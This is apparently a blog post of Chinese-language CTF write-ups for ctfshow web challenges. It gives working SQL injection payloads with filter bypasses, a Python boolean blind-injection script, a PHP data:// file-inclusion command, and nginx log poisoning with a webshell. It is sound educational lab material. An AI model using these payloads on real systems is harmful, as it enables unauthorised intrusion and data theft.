【Loading 13/30】ctfshow_WriteUp | WEB

web签到题

题目

web签到题

分析

F12 打开 html 文件:

将注释进行 Base64 解码得到 flag。

web2

题目

最简单的SQL注入

分析

看着应该是 SQL 注入题。


先尝试使用 admin 和 123456 登录,发现没有任何回显。看来报错被屏蔽了。


显然 admin 栏如果注入成功则属于字符型注入。尝试使用万能密码作为用户名登录并把后面的密码语句注释掉,填入 admin' or 1=1 #,密码随便填,得到登录成功的回显:


之后通过 “order by+数字” 猜测表的字段数,当猜测的数字小于或等于实际字段数,回显正确,否则报错。向用户名填入 admin' or 1=1 order by 10# 发现无任何回显,说明报错了。依次使用 9、8、7…… 替换上述命令中的 10,当尝试到 3 的时候出现回显,说明该表的字段数为 3:


在获得字段数之后,我们需要测试哪个字段在网站上能够得到回显。这里使用联合查询 union select 语句,向用户名传入 admin' or 1=1 union select 1,2,3#,得到的回显中只有 2,即只有第 2 个字段能够产生回显:


于是我们向第 2 个字段位置输入 database() 以获得当前数据库名,向用户名传入 admin' or 1=1 union select 1,database(),3#,得到数据库名为 web2:


通过 (select group_concat(table_name) from information_schema.tables where table_schema='xxx') 查询数据库 web2 的表名并将所有表名写入一行输出。其中 group_concat() 将所有内容写入一行并输出;information_schema 是 mysql 自带的库,记录了该数据库所有的表名和字段名。向用户名传入 admin' or 1=1 union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='web2'),3#,得到 web2 的表名 flag 和 user:


通过 (select group_concat(column_name) from information_schema.columns where table_name='xxx') 查询 web2 数据库 flag 表中的字段名并将所有字段名写入一行输出。向用户名传入 admin' or 1=1 union select 1,(select group_concat(column_name) from information_schema.columns where table_name='flag'),3#,得到字段名 flag:


最后查询 flag 字段的值。向用户名传入 admin' or 1=1 union select 1,(select flag from flag),3#,得到 flag。

参考

ctf.show web2 最简单的SQL注入-0d@y-CSDN
sql回显注入(满满的干货)-iwhattt-博客园
sql注入之万能密码总结-無名之涟-CSDN
SQL注入 (初级篇) 数字形注入与字符型注入区别-笑傲code-CSDN
SQL 注入之 UNION 查询(回显)-z_hunter-CSDN
浅谈SQL注入中的-1‘ union select 1,2,3#-娄不夜-CSDN
SQL注入:union注入学习笔记整理-冇得理想-CSDN
SQL注入如何判断数据库类型-2021!-CSDN
SQL注入常用命令-浅笑996-博客园
史上最全SQL基础知识总结(理论+举例)-Yvonne.Y-CSDN

web3

题目

更简单的web题

分析

代码出现 include,猜测是文件包含漏洞。


通过 data:// 数据流 + php 命令执行函数查询当前工作目录下的内容,使用 hackbar 需要先进行 url 编码:


得到 flag 文件名和首页文件:


?url=data://text/plain,%3C%3Fphp%0Asystem('cat ctf_go_go_go')%3B%0A%3F%3E 打开 flag 文件,得到 flag 内容。

参考

Web_XCTF_WriteUp | Web_php_include-Guanz-博客园

web4

题目

分析

和上一题显示的页面一样,用同样的方法尝试注入:


出现报错:

看来这题相比上一题增加了过滤。


使用 shell_exec 同理:


换个思路,尝试使用一句话木马连接服务器后台。


根据发回的响应包可以确定这题使用的是 nginx 服务器:


看看访问日志先,?url=/var/log/nginx/access.log


尝试使用日志包含写入一句话木马,往 User-Agent 字段传入一句话木马,木马内容如下图(ps:之前把一句话木马打出来,结果网页被火绒当作病毒了,找了我快四个小时啊啊啊啊啊啊啊啊


传入后的日志增加一条记录:


使用中国蚁剑连接日志文件,在 /var/www/flag.txt 目录找到 flag 内容。

参考

ctfshow_WriteUp | _萌新-Guanz-博客园

web5

题目

分析

php 代码审计题,看看代码:

<?php
error_reporting(0);  // 出错不报错
    
?>
<html lang="zh-CN">  // 中文语言

<head>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
    <meta name="viewport" content="width=device-width, minimum-scale=1.0, maximum-scale=1.0, initial-scale=1.0" />
    <title>ctf.show_web5</title>
</head>
<body>
    <center>
    <h2>ctf.show_web5</h2>
    <hr>
    <h3>
    </center>
    <?php
        $flag="";
        $v1=$_GET['v1'];  // get请求传入v1的值
        $v2=$_GET['v2'];  // get请求传入v2的值
        if(isset($v1) && isset($v2)){  // 如果对v1和v2都传入了值
            if(!ctype_alpha($v1)){  // 如果向v1传入的字符串中存在非字母字符
                die("v1 error");  // 输出“v1 error”并退出脚本
            }
            if(!is_numeric($v2)){  // 如果向v2传入的不是数字或数字字符串
                die("v2 error");  // 输出“v2 error”并退出脚本
            }
            if(md5($v1)==md5($v2)){  // 如果v1和v2的md5值在转换为相同类型后相等
                echo $flag;  // 输出flag
            }
        }else{
        
            echo "where is flag?";  // 输出“where is flag?”
        }
    ?>

</body>
</html>

源码对 v1 和 v2 的 md5 值进行松散比较。我们知道不同的明文计算出的 md5 值不可能相同,所以我们只能通过向 v1 传入字母字符串并向 v2 传入数字,使二者计算出的 md5 值转换为数字类型后相等即可。因为 php 会将“数字 + e”开头的字符串解释为科学计数法表示的数字,即 AeB 表示为值 \(A×10^{B}\),那么以 0e 开头的数字将一律被解释为 0。根据这一特点找到符合条件的 v1 和 v2 进行哈希值碰撞即可。


payload:?v1=QNKCDZO&v2=240610708

参考

PHP弱类型比较(松散比较)方面的漏洞-日暮途远.-CSDN
常见的MD5碰撞:md5值为0e开头-烟雨天青色-CSDN

web6

题目

分析

又是一道 sql 注入题,尝试万能密码 admin' or 1=1 # 注入用户名,密码随意,得到回显:


看来被过滤了,尝试了多种万能密码都得到相同的回显。


多次尝试绕过后,发现存在空格过滤,我们通过 admin'/**/or/**/1=1/**/# 完全替代空格对空格进行绕过:


之后的操作类似于 web2,我们从 admin'/**/or/**/1=1/**/order/**/by/**/10# 开始递减,尝试到 admin'/**/or/**/1=1/**/order/**/by/**/3# 时得到回显,说明该表的字段数为 3:


我们再向用户名传入 admin'/**/or/**/1=1/**/union/**/select/**/1,2,3#,在第 2 个字段得到回显:


向用户名传入 admin'/**/or/**/1=1/**/union/**/select/**/1,database(),3#,得到数据库名为 web2:


向用户名传入 admin'/**/or/**/1=1/**/union/**/select/**/1,(select/**/group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema='web2'),3#,得到 web2 的表名 flag 和 user:


向用户名传入 admin'/**/or/**/1=1/**/union/**/select/**/1,(select/**/group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_name='flag'),3#,得到字段名 flag:


向用户名传入 admin'/**/or/**/1=1/**/union/**/select/**/1,(select/**/flag/**/from/**/flag),3#,得到 flag 内容。

参考

千方百技第六期|MySQL注入绕过思路分享-安全玻璃盒_杭州孝道科技-FreeBuf网络安全行业门户
ctfshow_WriteUp | WEB-Guanz-博客园

web7

题目

分析

依次点击查看三篇文章,发现 url 分别为 index.php?id=1 index.php?id=2 index.php?id=3


尝试将 id 值改为 10000 和 -1,页面正常显示,猜测对 id 的值存在 sql 注入:


使用万能密码,对 id 传入值 ?id=1 or 1=1,发现存在过滤:


不会又是过滤空格吧?试试:


(邪魅一笑


查查字段数。还是从 ?id=1/**/or/**/1=1/**/order/**/by/**/10 开始递减,尝试到 ?id=1/**/or/**/1=1/**/order/**/by/**/3 时显示三篇文章内容,说明该表的字段数为 3:


看看回显位置。传入 ?id=1/**/or/**/1=1/**/union/**/select/**/1,2,3,在字段 2、3 的位置均得到回显:


我们选择向字段 2 的位置进行注入。传入 ?id=1/**/or/**/1=1/**/union/**/select/**/1,database(),3,得到数据库名为 web7:


向 id 继续传入 ?id=1/**/or/**/1=1/**/union/**/select/**/1,(select/**/group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema="web7"),3,得到 web7 的三个表名 flag,page,user:

这里的 table_schema 赋为 'web7' 时无法显示,需要用双引号包裹,猜测是存在单引号过滤。


向 id 传入值 ?id=1/**/or/**/1=1/**/union/**/select/**/1,(select/**/group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_name="flag"),3,得到字段名 flag:


继续传入 ?id=1/**/or/**/1=1/**/union/**/select/**/1,(select/**/flag/**/from/**/flag),3,得到 flag 内容。

web8

题目

做到这一题,基本可以写简单的注入工具了

分析

界面和上一题 web7 相同,但在查看回显位置的步骤时出现过滤:


反正只存在三个可能的回显位置,我们选择逐一尝试找到回显点,但还是被过滤了:


猜测是对联合查询 union select 存在过滤……尬住。


………………………… 2024/4/24 重做 …………………………


重新把这题的容器打开,发现环境升级为加密的了,尝试了一下发现不影响解题:


第一步照常判断表的字段数,从 ?id=1/**/or/**/1=1/**/order/**/by/**/10 开始递减,尝试到 ?id=1/**/or/**/1=1/**/order/**/by/**/3 时显示所有文章内容,说明该表的字段数为 3:


在现有 WP 中学习了一圈,发现不用联合查询的话还可以使用编码绕过,将 url 更改为 https://1ead7ab2-226b-418c-b837-6ac693695fc2.challenge.ctf.show/index.php?id=1/**/or/**/ascii(substr(database()/**/from/**/1/**/for/**/1))=32,运行后仅返回 id=1 的文章,即 or 之后的条件不成立。当 or 后面的语句成立时,页面将返回全部三篇文章。


这里的 ascii(substr(database()/**/from/**/1/**/for/**/1))=32database() 指当前数据库,substr()database() 的返回值即当前数据库名进行索引,因为在 Mysql 中字符索引从 1 开始,所以 substr(database(),1,1) 表示从当前数据库名的第 1 个字符开始,截取 1 个字符。因为这题对逗号和空格过滤,所以咱这里把命令用 substr(database()/**/from/**/1/**/for/**/1) 的方式表达。因为这题还对 '' 进行了过滤,需要外层的 ascii() 对内层返回的字符进行 ASCII 编码绕过,当编码结果等于 =后的数值时条件成立。同理,substr(database()/**/from/**/1/**/for/**/1)=chr(32) 表达了同样的意思。


参考大佬的脚本,我们对数据库名、表名、字段名及数据名进行爆破,为方便起见,我们将 id 的参数更改为 -1:

import requests  # http请求库

url = 'https://1ead7ab2-226b-418c-b837-6ac693695fc2.challenge.ctf.show/index.php?id=-1/**/or/**/'
name = ''

# 循环100次(循环次数按照返回的字符串长度自定义)  # 返回字符串长度即爆破出的数据库名/表名/字段名/数据
for i in range(1, 101):  # 1-100

    # 获取当前使用的数据库  # 依次截取database()数据库第1到100个字符
    # payload = 'ascii(substr(database()from/**/%d/**/for/**/1))=%d'
    # 获取当前数据库的所有表  # 依次截取表第1到100个字符,database()可替换为web8的十六进制表示0x77656238
    # payload = 'ascii(substr((select/**/group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema=database())from/**/%d/**/for/**/1))=%d'
    # 获取flag表的字段  # 依次截取字段第1到100个字符,0x666C6167是flag的十六进制表示
    # payload = 'ascii(substr((select/**/group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_name=0x666C6167)from/**/%d/**/for/**/1))=%d'
    # 获取flag表的数据  # 依次截取数据第1到100个字符
    payload = 'ascii(substr((select/**/flag/**/from/**/flag)from/**/%d/**/for/**/1))=%d'

    count = 0
    print('正在获取第 %d 个字符' % i)  # %格式化输出
    # 截取SQL查询结果的每个字符, 并判断字符内容
    for j in range(32, 128):  # ascii码从32尝试到127
        result = requests.get(url + payload % (i, j))  # payload第一个%d格式化为i值,第二个%d格式化为j值

        if 'If' in result.text:  # id设置为-1时不显示任一文章,当爆破出某一字符时将显示id=1,2,3的文章,其中id=1的文章标题为If
            name += chr(j)  # 拼接数据库名/表名/字段名/数据
            print('数据库名/表名/字段名/数据: %s' % name)
            break

        # 如果某个字符不存在,则停止程序
        count += 1
        if count >= (128 - 32):
            exit()

依次爆破数据库名/表名/字段名/数据,得到结果分别为 web8/flag,page,user/flag/ctfshow{ff22cab2-ac59-46d1-ac4b-9d7591bfe630}


爆破过程中可能存在网络不良而导致的爆破中断,可以根据爆破进度调整 i 值的起始值继续爆破。

参考

ctfshow-WEB-web8-士别三日wyx-CSDN
ctf_show Web的Web8题解-钟佳标-博客园

web9

题目

分析

得,这看着还是 SQL。试了试发现没有报错回显,尝试时间盲注也没有反应。在查看 robots 协议的时候发现一个 index.phps 文件:


下载得到如下内容:


<?php
        $flag="";
		$password=$_POST['password'];  // POST形式传参给password
		if(strlen($password)>10){  // password参数长度需小于等于10字符
			die("password error");
		}
		$sql="select * from user where username ='admin' and password ='".md5($password,true)."'";  // 查找user表中username为admin字段、password为输入值的原始16字符二进制格式输出的md5码的结果并返回
		$result=mysqli_query($con,$sql);  // 使用con的链接在数据库中查询sql
			if(mysqli_num_rows($result)>0){  // 如果返回结果集的行数大于0
					while($row=mysqli_fetch_assoc($result)){  // 循环从结果集中取一行作为关联数组直至取完每一行
						 echo "登陆成功<br>";
						 echo $flag;  // 输出flag
					 }
			}
    ?>

从源码仅能知道 password 参数的长度限制和查询方法,尝试万能密码注入后未能成功,于是 WP 解法,了解到一串神奇字符 ffifdyop,经 md5 计算后得到值为 276F722736C95D99E921722CF9ED621C,转换为字符串得到 'or'6É]™é!r,ùíb,因为 or 之后的值非零被认定为 TRUE,所以该字符串的 md5 值构成万能密码,得到 flag。

参考

while循环如何使用mysqli_fetch_assoc()?-腾讯云开发者社区-腾讯云
ctfshow-web9(奇妙的ffifdyop绕过)-Myon⁶-CSDN
ctfshow-web9-AW_SOLE-博客园
GitHub - maurosoria_dirsearch: Web path scanner
CyberChef

web10

题目

分析

这题多了个取消按钮?点一下!


下载了个 index.phps。

<?php
		$flag="";
        function replaceSpecialChar($strParam){  // 一个去除特殊字符的函数
             $regex = "/(select|from|where|join|sleep|and|\s|union|,)/i";  // 匹配的字符串是不区分大小写的select、from、where、join、sleep、and、所有空白符、union、,
             return preg_replace($regex,"",$strParam);  // 将strParam字符串按regex模式匹配到的结果删掉
        }
        if (!$con)  // 如果没有对con传参
        {
            die('Could not connect: ' . mysqli_error());  // 输出Could not connect: +报错内容后结束脚本
        }
		if(strlen($username)!=strlen(replaceSpecialChar($username))){  // 如果username参数经过replaceSpecialChar函数后字符串长度不同
			die("sql inject error");  // 输出sql inject error后结束脚本
		}
		if(strlen($password)!=strlen(replaceSpecialChar($password))){  // 如果password参数经过replaceSpecialChar函数后字符串长度不同
			die("sql inject error");  // 输出sql inject error后结束脚本
		}
		$sql="select * from user where username = '$username'";  // sql语句在user表中查找username等于输入值的数据
		$result=mysqli_query($con,$sql);  // 通过con连接根据sql语句查询
			if(mysqli_num_rows($result)>0){  // 如果返回结果集的行数大于0
					while($row=mysqli_fetch_assoc($result)){  // 循环从结果集中取一行作为关联数组直至取完每一行
						if($password==$row['password']){  // 如果返回的密码列中存在与输入密码相同的值
							echo "登陆成功<br>";
							echo $flag;  // 输出flag
						}

					 }
			}
    ?>

好家伙好家伙,把路堵死了是吧。


使用 WP 解法,学到一种巧妙操作,payload:username=admin'/**/or/**/1=1/**/group/**/by/**/password/**/with/**/rollup#&password=,其中:
group by:mysql 语句,将结果按所选表头的值进行分组。该语句中将结果按 password 的值分类进行输出。
with rollup:mysql 语句,定义在 group by 之后,将分类后的结果进行统计,输出时在表末尾增加一行名为 NULL、值为统计总数的记录。该语句中在 group by 输出表格的基础上增加一行 password 值为 NULL 的记录输出。
/**/:用于绕过对空白符的过滤。
#:注释符。作为语句的结束,将后面的 password 注释掉。


因为输出的 password 值中存在一行 NULL,以上 payload 不对 password 进行传参,使得 password 值为 NULL,从而满足 flag 的输出条件。

参考

CTF show WEB10-yu22x-CSDN

web11

题目

分析

<?php
        function replaceSpecialChar($strParam){  // 一个去除特殊字符的函数
             $regex = "/(select|from|where|join|sleep|and|\s|union|,)/i";  // 匹配的字符串是不区分大小写的select、from、where、join、sleep、and、所有空白符、union、,
             return preg_replace($regex,"",$strParam);  // 将strParam字符串按regex模式匹配到的部分删掉
        }
        if(strlen($password)!=strlen(replaceSpecialChar($password))){  // 如果匹配前后字符串长度改变
            die("sql inject error");  // 输出sql inject error后结束脚本
        }
        if($password==$_SESSION['password']){  // 将输入的password比对session中的数据
            echo $flag;  // 相同输出flag
        }else{
            echo "error";  // 不同输出error
        }
    ?>

这题需要比对的值在 session 中,session 是存储在服务器中的。而且容器的密码框内预先给出了一串密码,先登录拦包看看:


从拦截到的请求包可以看出:

  1. 预置密码是 123456
  2. PHPSESSID 值已经存在

根据源码,客户端将向服务端发送带 PHPSESSID 值的请求包,服务器通过该 PHPSESSID 值查找服务端的 session 文件,将得到的 $_SESSION['password'] 值与输入的 password 进行比对。


看大佬是 WP 是直接将 PHPSESSID 值删除并把 password 值置空提交的,猜测是由于 PHPSESSID 是客户端第一次向服务端发送请求时创建的,当请求包中的 PHPSESSID 值为空时,服务端会认为该请求来自新用户,并为其创建一个新的 PHPSESSID,此时该 PHPSESSID 对应的所有都为空,则参数为 NULL 的 $_SESSION['password'] 与空的 password 比较必然相等,满足判断条件,从而得到 flag。

参考

PHP中Session ID的实现原理分析和实例解析-php007-腾讯云开发者社区

web12

题目

分析

F5 打开 html 代码,看到一条提示:


尝试了一些常用命令结果没有反应:


大佬的 WP 学到能以数组方式返回目录的函数 scandir()glob(),通过 print_r() 函数可将数组内容打印出来:


列表中出现的长名称文件显得很可疑,highlight_file() 查看文件内容成功,得到 flag:


参考

ctfshow-web12-AW_SOLE-博客园
PHP中的代码执行,命令执行与常见bypass技巧-k1hedodo-FreeBuf网络安全行业门户

【未完成】红包题第二弹

题目

分析

这题和 web12 很像,包括注释:

先看看 php 版本。传入 ?cmd=phpinfo(); 掉落源码:

<?php
#error_reporting(0);
?>
<html lang="zh-CN">
<head>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
    <meta name="viewport" content="width=device-width  minimum-scale=1.0  maximum-scale=1.0  initial-scale=1.0" />
    <title>ctf.show_红包题</title>
</head>
<body>
    <center>
    <h2>ctf.show_红包题</h2>
    <h4>where is the flag?</h4>
    </center>
    <!-- hint:?cmd= -->
    <?php
        if(isset($_GET['cmd'])){  // 如果cmd接收到传参
            $cmd=$_GET['cmd'];  // 参数赋给cmd
            highlight_file(__FILE__);  // 当前文件高亮显示
            if(preg_match("/[A-Za-oq-z0-9$]+/",$cmd)){  // 如果cmd的结尾正则匹配上大写字母、小写字母(除q以外)和数字一次或多次
                die("cerror");  // 输出cerror并退出脚本
            }
            if(preg_match("/\~|\!|\@|\#|\%|\^|\&|\*|\(|\)|\(|\)|\-|\_|\{|\}|\[|\]|\'|\"|\:|\,/",$cmd)){  // 如果cmd正则匹配上“~”或“!”或“@”或“#”或“%”或“^”或“&”或“*”或“(”或“)”或“(”或“)”或“-”或“_”或“{”或“}”或“[”或“]”或“'”或“"”或“:”或“,”
                die("serror");  // 输出serror并退出脚本
            }
            eval($cmd);  // 执行cmd语句
        }
     ?>
</body>
</html>

过滤了末尾的大小写和数字,以及对整个字符串进行符号过滤。没有被过滤的字符有 p ` $ + = ; < > . / ?

posted @ 2024-03-06 18:23  Guanz  阅读(18)  评论(0编辑  收藏  举报